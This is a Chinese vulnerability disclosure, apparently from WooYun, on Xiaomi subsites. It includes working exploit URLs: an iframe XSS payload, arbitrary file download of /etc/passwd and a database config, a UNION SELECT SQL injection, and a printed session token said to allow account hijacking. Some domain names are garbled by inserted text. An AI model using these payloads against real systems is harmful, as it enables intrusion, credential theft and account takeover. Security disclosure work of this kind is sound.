1:网站+论坛的错误信息泄露 2:跨站攻击 3:任意文件下载 4:会话管理隐患 后续有新发现会继续更新。 漏洞 证明: 1:网站+ 论坛 的错误信息泄露 http://res.api.miui测试数据/index.php http://bbs.xiaomi测试数据/uc_server/control/admin/db.php http://bbs.miliao测试数据/uc_server/control/admin/db.php http://ucenter.miui测试数据/uc_server/control/admin/db.php http://HdhCmsTestxiaomigongshe测试数据/wp-admin/includes/admin.php http://resource.xiaomi.net/ 2:跨站攻击 munion.xiaomi测试数据/index.php?mod=<iframe src=//> 3:任意文件 下载 http://180.186.32.249/web/common/getfile.jsp?p=/etc/passwd http://180.186.32.249/web/common/getfile.jsp?p=/opt/uficc/web/admin/login.jsp http://180.186.32.249/web/common/getfile.jsp?p=/opt/uficc/icc_config/Proxool.properties 数据库 帐号密码 4:会话管理隐患 http://order.xiaomi测试数据/site/callback?referer=http%3A%2F%2FHdhCmsTestxiaomi测试数据%2F&token=S8yHMDpLJ0Lc432m%2BJAQm5eNQxFBlRS7MbwAUj4KKM167uPKTdiZOfg0%2F1H05maHjIvK0PF1ddFL%2B2oWju0Y1z0MNNfWO0DkMw0rloN%2FCGPUNx32vPCtZdpiY8ipQJsqku3cYSBn6IjHNbbahQvHCktF%2BFtTRew3gFE1se%2BfyVLIquEbGayAlk8ZLlfF2QCOZcnTTzhLoZIWltApcgkcL01uY84SYzYn29iczPjsWuE%3D 在任意第三方获取token后可劫持该帐号,且不论该帐号修改了密码均可劫持帐户,并没有时间限制(同时未进行二次会话验证,),只要一个token在手,实时有效。 修复方案: 修复方案: 1:关闭php错误信息显示 2:过滤非法敏感参数 3:可以使用服务器的用户权限来解决。 作者 猪哥靓@乌云 第二部分: 1、某分站SQL注射点 http://tg.miliao测试数据/index.php?action=member-register&act=getSchool&province_id=101%20and%201=2%20union%20select%201,2,TABLE_NAME,4%20from%20INFORMATION_SCHEMA.TABLES-- 2、Miui 某注入BUG http://HdhCmsTestmiui测试数据/extra.php?mod=themevote/stat&tpp=1/*!select*/&page=2 此定义为BUG,因为暂没发现可以利用的方法。 修复方案:加强防注 作者 Jannock
查看更多关于小米科技网站群(子站)漏洞集锦 - 网站安全 - 自学的详细内容...